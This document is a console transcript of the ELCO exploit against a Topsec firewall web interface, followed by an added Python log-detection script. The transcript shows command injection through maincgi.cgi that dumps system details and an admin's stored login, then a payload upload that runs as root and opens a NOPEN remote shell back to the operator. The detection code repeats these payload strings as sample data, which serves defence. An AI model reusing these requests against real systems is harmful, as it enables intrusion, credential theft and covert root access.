# Eligible Contestant (ELCO) exploit
# cat ELCA.txt
# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234

NOPEN!                             v3.0.5.3

Wed Aug 17 19:14:54 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Entering callback mode
Waiting...
# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecontestant.py -t https://127.0.0.1:443 touch
[+] Seeded PRNG with 1471461306.3
[+] Preparing to run specified command...
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   binpath = /current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static :: Path to tool being used.
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = False :: Load last session used.
   quiet = False :: Disable verbose logging
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
['target']
Namespace(ask=False, binpath=u'/current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static', cert=None, color=False, debug=False, func=<unbound method ELCOExploit.do_touch>, host=' ', loadlast=False, mode='nopen', quiet=False, session=None, target='https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Requesting head https://127.0.0.1:443/site/image/white.gif with following provided settings: {'allow_redirects': False}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "HEAD /site/image/white.gif HTTP/1.1" 200 0
[+] Touch result: HEAD /site/image/white.gif - 200
[+] Touch result: Header: last-modified -- Fri, 18 Aug 2006 19:07:33 GMT
[+] Touch result: Header: content-length -- 837
[+] Touch result: Header: etag -- W/"3cd-345-4ce49cb1"
[+] Touch result: Header: date -- Fri, 18 Aug 2006 19:07:33 GMT
[+] Touch result: Header: accept-ranges -- bytes
[+] Touch result: Header: content-type -- image/gif
[+] Touch result: Header: server -- Topsec
[+] Touch result: HEAD /site/image/white.gif - 200
[+] Touch result: Header: last-modified -- Fri, 18 Aug 2006 19:07:33 GMT
[+] Touch result: Header: content-length -- 837
[+] Touch result: Header: etag -- W/"3cd-345-4ce49cb1"
[+] Touch result: Header: date -- Fri, 18 Aug 2006 19:07:33 GMT
[+] Touch result: Header: accept-ranges -- bytes
[+] Touch result: Header: content-type -- image/gif
[+] Touch result: Header: server -- Topsec
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-201506.log and /current/down/fosho/2016-08-17-201506_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecontestant.py -l probe
[+] Seeded PRNG with 1471461312.61
[+] Preparing to run specified command...
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   binpath = /current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static :: Path to tool being used.
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = True :: Load last session used.
   quiet = False :: Disable verbose logging
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
['target']
Namespace(ask=False, binpath=u'/current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static', cert=None, color=False, debug=False, func=<unbound method ELCOExploit.do_probe>, host=u' ', loadlast=True, mode=u'nopen', quiet=False, session=None, target=u'https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Scheduling cleanup in 60 seconds...
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'allow_redirects': True, 'params': {'Url': 'Command', 'Action': 'sh', 'Para': 'sh -c (\tsleep\t60\t&&\trm\t-f\t/www/htdocs/site/pages/.JmiwrZV\t)'}}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "GET /cgi/maincgi.cgi?Url=Command&Action=sh&Para=sh+-c+%28%09sleep%0960%09%26%26%09rm%09-f%09%2Fwww%2Fhtdocs%2Fsite%2Fpages%2F.JmiwrZV%09%29 HTTP/1.1" 200 None
[+] Probing system and retrieving target info...
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'allow_redirects': True, 'params': {'Url': 'Command', 'Action': 'sh', 'Para': 'sh -c (\tcat\t/e*/is*\t&&\tuname\t-a\t&&\t/t*/b*/cfgt*\tsystem\tadmininfo\tshowonline\t&&\tcat\t/*/*coo*/*\t)>/www/htdocs/site/pages/.JmiwrZV'}}
[+] "GET /cgi/maincgi.cgi?Url=Command&Action=sh&Para=sh+-c+%28%09cat%09%2Fe%2A%2Fis%2A%09%26%26%09uname%09-a%09%26%26%09%2Ft%2A%2Fb%2A%2Fcfgt%2A%09system%09admininfo%09showonline%09%26%26%09cat%09%2F%2A%2F%2Acoo%2A%2F%2A%09%29%3E%2Fwww%2Fhtdocs%2Fsite%2Fpages%2F.JmiwrZV HTTP/1.1" 200 None
[+] Requesting get https://127.0.0.1:443/site/pages/.JmiwrZV with following provided settings: {'allow_redirects': True}
[+] "GET /site/pages/.JmiwrZV HTTP/1.1" 200 584
[+] System information retrieved:
Topsec Operating System v3.3.006.076.1
Topsec Network Security Technology CO.,LTD
http://www.topsec.com.cn
Linux (none) 2.6.27 #1 Thu Nov 18 11:15:12 HKT 2010 i686 unknown
Manager_name       Auth_address       Privilege          Online_time(hh:mm:ss)

tosusername=test
tospassword=dGVzdA==
tosusertype=7
auth_id=47
g_vsid=0
logintime=1150174789
milsecond=956
refreshtimes=0
sys_setup=2
sys_maintainance=2
sys_monitor=2
network=2
policy=2
vpn=2
sslvpn=2
aaa_conf=2
log_conf=2
log_access=2
anti_virus=2
resource_conf=2
dpi_conf=2
pki_conf=2
ids_conf=2
anti_spam=2
ha_conf=2

[+] Forcing removal of temp file from target now...
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'allow_redirects': True, 'params': {'Url': 'Command', 'Action': 'sh', 'Para': 'sh -c killall\tsleep\t&&\trm\t-f\t/www/htdocs/site/pages/.JmiwrZV'}}
[+] "GET /cgi/maincgi.cgi?Url=Command&Action=sh&Para=sh+-c+killall%09sleep%09%26%26%09rm%09-f%09%2Fwww%2Fhtdocs%2Fsite%2Fpages%2F.JmiwrZV HTTP/1.1" 200 None
[-] User may be logged in. PLEASE REVIEW SYSTEM INFO
[+] Target is vulnerable. Safe to proceed.
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-201512.log and /current/down/fosho/2016-08-17-201512_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecontestant.py -l exploit -c 127.0.0.1:1234
[+] Seeded PRNG with 1471461330.38
[+] Preparing to run specified command...
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   binpath = /current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static :: Path to tool being used.
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = True :: Load last session used.
   quiet = False :: Disable verbose logging
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
   callback = 127.0.0.1:1234 :: Callback IP:Port for tool (Example: 127.0.0.1:12345)
['target', 'binpath', 'callback', 'mode']
Namespace(ask=False, binpath=u'/current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static', callback='127.0.0.1:1234', cert=None, color=False, debug=False, func=<unbound method ELCOExploit.do_exploit>, host=u' ', loadlast=True, mode=u'nopen', quiet=False, session=None, target=u'https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Uploading and running payload...
[+] Requesting post https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'files': {'vvnHD': <StringIO.StringIO instance at 0xb6d9454c>}, 'data': {'Url': 'Command', 'Action': 'sh', 'Para': 'sh -c rm\t-f\t/tmp/ht*;tar\txzvf\t`ls\t-c\t/tmp/cgi*|head\t-n\t1`\t-C\t/tmp/\t&&\tchmod\t+x\t/tmp/ht*;/tmp/htpd'}}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "POST /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Exploit complete. Got root?
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-201530.log and /current/down/fosho/2016-08-17-201530_http.log
# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234

NOPEN!                             v3.0.5.3

Wed Aug 17 19:14:54 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Entering callback mode
Waiting...
Listening on *:1234... ok
Accepted connection from 127.0.0.1:39636
Initiating RSA key exchange
  Generating random number... ok
  Initializing RC6... ok
  Sending random number... ok
  Receiving random number... ok
  Generating session key... 0x1D1FFA80837E2AE0ED44E8C441F1405C
  Sending first verify string... ok
  Receiving second verify string... ok
  Checking second verify string... ok
RSA key exchange complete
NOPEN server version... 3.0.5.3

Connection
  Bytes In / Out     196/75 (261%C) / 63/4 (1575%C)
  Local Host:Port    localhost:1234 (127.0.0.1:1234)
  Remote Host:Port   127.0.0.1:0 (127.0.0.1:0)
  Remote Host:Port   (none):39636 (127.0.0.1:39636)
Local
  NOPEN client       3.0.5.3
  Date/Time          Wed Aug 17 19:15:34 UTC 2016
  History
  Command Out
  CWD                /current/bin
  NHOME              /current/bin/..
  PID (PPID)         4871 (4525)
Remote
  NOPEN server       3.0.5.3
  WDIR               NOT SET
  OS                 Linux 2.6.27 #1 Thu Nov 18 11:15:12 HKT 2010 i686
  CWD                /
  PID (PPID)         723 (1)

History loaded from "/current/bin/../down/history/(none).127.0.0.1"... ok
Creating command output file "/current/bin/../down/cmdout/(none).127.0.0.1-2016-08-17-19:15:35"... ok

Lonely?  Bored?  Need advice?  Maybe "-help" will show you the way.

We are starting up our virtual autoport
We are bound and ready to go on port 1025
NO! (none):/>
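The transcript above carries no commentary, but three stages are observable on the wire and all three leave traces a defender can hunt for: the "touch" is a HEAD for /site/image/white.gif that keys on the `Server: Topsec` response header; the "probe" drives the firewall's own CGI with `Url=Command&Action=sh&Para=<shell command>`, separating shell tokens with tabs (`%09`) rather than spaces, writes the output into a random dotfile under /www/htdocs/site/pages/ and reads it back over HTTPS; the "exploit" uploads a tarball in a multipart POST that the access log records only as `POST /cgi/maincgi.cgi`, with the same `Url`/`Action`/`Para` fields carried in the form body. The following detection logic is an added example written for this page; it is not part of the leaked tooling or of the original post. It assumes access logs in Apache/nginx "combined"-style format, and the sample lines, client addresses, timestamps and response sizes are constructed to mirror the requests visible in the session.

```python
"""Flag the ELCO-style request pattern against /cgi/maincgi.cgi in access logs.

Added example, not part of the leaked tooling or of the original post.  Each
line is parsed, its query string decoded, and the observable stages flagged:
the command-injection GET, the fetch of the hidden staging file, and, when a
body-inspecting proxy or WAF hands us the form fields, the exploit's POST.
"""
import re
from urllib.parse import parse_qs, urlsplit

# "combined"-style access line: client ident user [ts] "METHOD URI HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

CGI_PATH = "/cgi/maincgi.cgi"
# The probe stages its command output in a random dotfile under the pages dir.
STAGED_OUTPUT_RE = re.compile(r"^/site/pages/\.[A-Za-z0-9]+$")


def normalise_para(para):
    """The tool separates shell tokens with tabs (%09), not spaces, so a naive
    search for 'sh -c <something>' written with spaces sees only the first
    tokens.  Collapse tabs to single spaces for display and further matching."""
    return " ".join(t for t in para.split("\t") if t != "")


def is_shell_injection(fields):
    """True when the Url/Action fields select the firewall's shell action."""
    return fields.get("Url") == ["Command"] and fields.get("Action") == ["sh"]


def classify(line, form=None):
    """Return a finding dict for one access-log line, or None.

    `form` is an optional dict of POST form fields (list-valued, as parse_qs
    returns them) from a body-inspecting proxy; plain access logs lack it.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("uri"))
    base = {"client": m.group("client"), "ts": m.group("ts"), "status": m.group("status")}

    if url.path == CGI_PATH:
        fields = parse_qs(url.query) if m.group("method") == "GET" else (form or {})
        if is_shell_injection(fields):
            para = fields.get("Para", [""])[0]
            return dict(base, kind="command_injection", method=m.group("method"),
                        command=normalise_para(para))
        return None  # ordinary admin-UI traffic to the same CGI

    if STAGED_OUTPUT_RE.match(url.path):
        return dict(base, kind="staged_output_fetch", path=url.path)
    return None


def scan(lines, forms=None):
    """Classify every line; `forms` maps line index -> form fields when known."""
    forms = forms or {}
    findings = []
    for i, line in enumerate(lines):
        f = classify(line, forms.get(i))
        if f:
            findings.append(f)
    return findings


# Constructed sample, modelled on the requests in the session above.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Aug/2016:19:15:06 +0000] "HEAD /site/image/white.gif HTTP/1.1" 200 0',
    '10.0.0.5 - - [17/Aug/2016:19:15:12 +0000] "GET /cgi/maincgi.cgi?Url=Command&Action=sh'
    '&Para=sh+-c+%28%09sleep%0960%09%26%26%09rm%09-f%09%2Fwww%2Fhtdocs%2Fsite%2Fpages%2F.JmiwrZV%09%29'
    ' HTTP/1.1" 200 312',
    '10.0.0.5 - - [17/Aug/2016:19:15:12 +0000] "GET /site/pages/.JmiwrZV HTTP/1.1" 200 584',
    '10.0.0.5 - - [17/Aug/2016:19:15:30 +0000] "POST /cgi/maincgi.cgi HTTP/1.1" 200 -',
    '192.0.2.10 - - [17/Aug/2016:19:16:01 +0000] "GET /cgi/maincgi.cgi?Url=Status&Action=view HTTP/1.1" 200 1024',
]
# Form body of the POST (index 3) as a body-inspecting proxy would record it.
SAMPLE_FORMS = {3: {"Url": ["Command"], "Action": ["sh"],
                    "Para": ["sh -c rm\t-f\t/tmp/ht*;tar\txzvf\t`ls\t-c\t/tmp/cgi*|head\t-n\t1`"
                             "\t-C\t/tmp/\t&&\tchmod\t+x\t/tmp/ht*;/tmp/htpd"]}}

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, SAMPLE_FORMS):
        print(finding)
```

The HEAD for white.gif is deliberately not flagged on its own: it is a legitimate static asset and only becomes interesting in sequence with the CGI requests from the same client. Likewise a bare `POST /cgi/maincgi.cgi` is the admin interface's normal traffic; without the form body (a WAF or reverse proxy that logs multipart fields) the upload stage is indistinguishable from a configuration change, so the strongest log-only indicators are the `Url=Command&Action=sh` query and any fetch of a dotfile under /site/pages/.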